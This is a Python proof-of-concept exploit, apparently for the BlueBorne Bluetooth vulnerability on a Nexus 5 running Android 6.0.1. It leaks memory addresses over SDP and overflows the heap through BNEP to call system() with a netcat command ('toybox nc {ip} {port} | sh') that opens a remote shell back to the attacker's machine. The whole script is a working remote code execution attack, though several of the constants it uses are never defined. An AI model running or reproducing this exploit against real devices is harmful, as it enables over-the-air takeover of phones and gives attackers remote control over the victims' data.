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Blueborne RCE PoC - Nexus5 6.0.1
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import os | |
import sys | |
import time | |
import struct | |
import select | |
import binascii | |
import bluetooth | |
from bluetooth import _bluetooth as bt | |
import bluedroid | |
import connectback | |
from pwn import log | |
# Listening TCP ports that need to be opened on the attacker machine | |
NC_PORT = 1233 | |
STDOUT_PORT = 1234 | |
STDIN_PORT = 1235 | |
# Exploit offsets work for these (exact) libs: | |
# bullhead:/ # sha1sum /system/lib/hw/bluetooth.default.so | |
# 8a89cadfe96c0f79cdceee26c29aaf23e3d07a26 /system/lib/hw/bluetooth.default.so | |
# bullhead:/ # sha1sum /system/lib/libc.so | |
# 0b5396cd15a60b4076dacced9df773f75482f537 /system/lib/libc.so | |
# For Pixel 7.1.2 patch level Aug/July 2017 | |
#LIBC_TEXT_STSTEM_OFFSET = 0x45f80 + 1 - 56 # system + 1 | |
#LIBC_SOME_BLX_OFFSET = 0x1a420 + 1 - 608 # eventfd_write + 28 + 1 | |
# Nexus 5 6.0.1 | |
LIBC_TEXT_STSTEM_OFFSET = 0x3ea04 + 1 # system + 1 | |
LIBC_SOME_BLX_OFFSET = 0x5825b | |
# For Nexus 5X 7.1.2 patch level Aug/July 2017 | |
#LIBC_TEXT_STSTEM_OFFSET = 0x45f80 + 1 | |
#LIBC_SOME_BLX_OFFSET = 0x1a420 + 1 | |
# Aligned to 4 inside the name on the bss (same for both supported phones) | |
# Nexus 5 6.0.1 | |
MAX_BT_NAME = 0xf5 | |
# Payload details (attacker IP should be accessible over the internet for the victim phone) | |
SHELL_SCRIPT = b'toybox nc {ip} {port} | sh' | |
BNEP_PSM = 15 | |
def set_bt_name(payload, src_hci, src, dst): | |
# Create raw HCI sock to set our BT name | |
raw_sock = bt.hci_open_dev(bt.hci_devid(src_hci)) | |
flt = bt.hci_filter_new() | |
bt.hci_filter_all_ptypes(flt) | |
bt.hci_filter_all_events(flt) | |
raw_sock.setsockopt(bt.SOL_HCI, bt.HCI_FILTER, flt) | |
# Send raw HCI command to our controller to change the BT name (first 3 bytes are padding for alignment) | |
raw_sock.sendall(binascii.unhexlify('01130cf8cccccc') + payload.ljust(MAX_BT_NAME, b'\x00')) | |
raw_sock.close() | |
#time.sleep(1) | |
time.sleep(0.1) | |
# Connect to BNEP to "refresh" the name (does auth) | |
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP) | |
bnep.bind((src, 0)) | |
bnep.connect((dst, BNEP_PSM)) | |
bnep.close() | |
# Close ACL connection | |
os.system('hcitool dc %s' % (dst,)) | |
#time.sleep(1) | |
def set_rand_bdaddr(src_hci): | |
addr = ['%02x' % (ord(c),) for c in os.urandom(6)] | |
# NOTW: works only with CSR bluetooth adapters! | |
os.system('sudo bccmd -d %s psset -r bdaddr 0x%s 0x00 0x%s 0x%s 0x%s 0x00 0x%s 0x%s' % | |
(src_hci, addr[3], addr[5], addr[4], addr[2], addr[1], addr[0])) | |
final_addr = ':'.join(addr) | |
log.info('Set %s to new rand BDADDR %s' % (src_hci, final_addr)) | |
#time.sleep(1) | |
while bt.hci_devid(final_addr) < 0: | |
time.sleep(0.1) | |
return final_addr | |
def memory_leak_get_bases(src, src_hci, dst): | |
prog = log.progress('Doing stack memeory leak...') | |
# Get leaked stack data. This memory leak gets "deterministic" "garbage" from the stack. | |
result = bluedroid.do_sdp_info_leak(dst, src) | |
#print("Leak: %s" % result) # Debug, show leak array | |
# Calculate according to known libc.so and bluetooth.default.so binaries | |
#likely_some_libc_blx_offset = result[-3][-2] | |
#likely_some_bluetooth_default_global_var_offset = result[6][0] | |
# Nexus 5 6.0.1 | |
likely_some_libc_blx_offset = result[6][1] | |
likely_some_bluetooth_default_global_var_offset = result[10][7] | |
# Show leak address | |
log.info("LIBC 0x%08x" % likely_some_libc_blx_offset) | |
log.info("BT 0x%08x" % likely_some_bluetooth_default_global_var_offset) | |
libc_text_base = likely_some_libc_blx_offset - LIBC_SOME_BLX_OFFSET | |
bluetooth_default_bss_base = likely_some_bluetooth_default_global_var_offset - BLUETOOTH_BSS_SOME_VAR_OFFSET | |
log.info('libc_base: 0x%08x, bss_base: 0x%08x' % (libc_text_base, bluetooth_default_bss_base)) | |
# Close SDP ACL connection | |
os.system('hcitool dc %s' % (dst,)) | |
time.sleep(0.1) | |
prog.success() | |
return libc_text_base, bluetooth_default_bss_base | |
def pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base): | |
# Gen new BDADDR, so that the new BT name will be cached | |
src = set_rand_bdaddr(src_hci) | |
# Payload is: '"\x17AAAAAAsysm";\n<bash_commands>\n#' | |
# 'sysm' is the address of system() from libc. The *whole* payload is a shell script. | |
# 0x1700 == (0x1722 & 0xff00) is the "event" of a "HORRIBLE_HACK" message. | |
#payload = struct.pack('<III', 0x41411722, 0x41414141, system_addr) + b'";\n' + SHELL_SCRIPT.format(ip=my_ip, port=NC_PORT) + b'\n#' | |
# x -> payload address (name has 4 bytes of padding) | |
x = acl_name_addr+4 | |
shell_addr = x+24 # SHELL SCRIPT address | |
ptr0 = x+16 -4 # points to ptr0+4 (ptr1) | |
ptr1 = x+8 -8 # points to ptr1+8 (ptr2) | |
ptr2 = x+20 -28 # points to ptr2+28 (system_addr) | |
#payload = 'A'+ struct.pack('<IIIIII', shell_addr, 0x41414141, ptr2, 0x42424242, ptr1, system_addr) + SHELL_SCRIPT.format(ip=my_ip, port=NC_PORT) | |
payload = 'A'+ struct.pack('<IIIIII', shell_addr, ptr1, ptr2, ptr0, ptr1, system_addr) + SHELL_SCRIPT.format(ip=my_ip, port=NC_PORT) | |
log.info("shelladdr 0x%08x" % shell_addr) | |
log.info("ptr0 0x%08x" % ptr0) | |
log.info("ptr1 0x%08x" % ptr1) | |
log.info("ptr2 0x%08x" % ptr2) | |
log.info("system 0x%08x" % system_addr) | |
log.info("PAYLOAD %s" % payload) | |
assert len(payload) < MAX_BT_NAME | |
assert b'\x00' not in payload | |
# Puts payload into a known bss location (once we create a BNEP connection). | |
set_bt_name(payload, src_hci, src, dst) | |
prog = log.progress('Connecting to BNEP again') | |
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP) | |
bnep.bind((src, 0)) | |
bnep.connect((dst, BNEP_PSM)) | |
prog.success() | |
prog = log.progress('Pwning...') | |
# Each of these messages causes BNEP code to send 100 "command not understood" responses. | |
# This causes list_node_t allocations on the heap (one per reponse) as items in the xmit_hold_q. | |
# These items are popped asynchronously to the arrival of our incoming messages (into hci_msg_q). | |
# Thus "holes" are created on the heap, allowing us to overflow a yet unhandled list_node of hci_msg_q. | |
for i in range(20): | |
bnep.send(binascii.unhexlify('8109' + '800109' * 100)) | |
# Repeatedly trigger the vuln (overflow of 8 bytes) after an 8 byte size heap buffer. | |
# This is highly likely to fully overflow over instances of "list_node_t" which is exactly | |
# 8 bytes long (and is *constantly* used/allocated/freed on the heap). | |
# Eventually one overflow causes a call to happen to "btu_hci_msg_process" with "p_msg" | |
# under our control. ("btu_hci_msg_process" is called *constantly* with messages out of a list) | |
for i in range(1000): | |
# If we're blocking here, the daemon has crashed | |
_, writeable, _ = select.select([], [bnep], [], PWNING_TIMEOUT) | |
if not writeable: | |
break | |
bnep.send(binascii.unhexlify('810100') + | |
struct.pack('<II', 0, ptr0)) | |
else: | |
log.info("Looks like it didn't crash. Possibly worked") | |
prog.success() | |
def main(src_hci, dst, my_ip): | |
os.system('hciconfig %s sspmode 0' % (src_hci,)) | |
os.system('hcitool dc %s' % (dst,)) | |
sh_s, stdin, stdout = connectback.create_sockets(NC_PORT, STDIN_PORT, STDOUT_PORT) | |
for i in range(PWN_ATTEMPTS): | |
log.info('Pwn attempt %d:' % (i,)) | |
# Create a new BDADDR | |
src = set_rand_bdaddr(src_hci) | |
#set_bt_name("TESTTESTTESTTEST", src_hci, src, dst) # Set Name, REMOTE_NAME address search | |
# Try to leak section bases | |
for j in range(LEAK_ATTEMPTS): | |
libc_text_base, bluetooth_default_bss_base = memory_leak_get_bases(src, src_hci, dst) | |
if (libc_text_base & 0xfff == 0) and (bluetooth_default_bss_base & 0xfff == 0): | |
break | |
else: | |
assert False, "Memory doesn't seem to have leaked as expected. Wrong .so versions?" | |
system_addr = LIBC_TEXT_STSTEM_OFFSET + libc_text_base | |
acl_name_addr = BSS_ACL_REMOTE_NAME_OFFSET + bluetooth_default_bss_base | |
assert acl_name_addr % 4 == 0 | |
log.info('system: 0x%08x, acl_name: 0x%08x' % (system_addr, acl_name_addr)) | |
pwn(src_hci, dst, bluetooth_default_bss_base, system_addr, acl_name_addr, my_ip, libc_text_base) | |
# Check if we got a connectback | |
readable, _, _ = select.select([sh_s], [], [], PWNING_TIMEOUT) | |
if readable: | |
log.info('Done') | |
break | |
else: | |
assert False, "Pwning failed all attempts" | |
connectback.interactive_shell(sh_s, stdin, stdout, my_ip, STDIN_PORT, STDOUT_PORT) | |
if __name__ == '__main__': | |
main(*sys.argv[1:]) |
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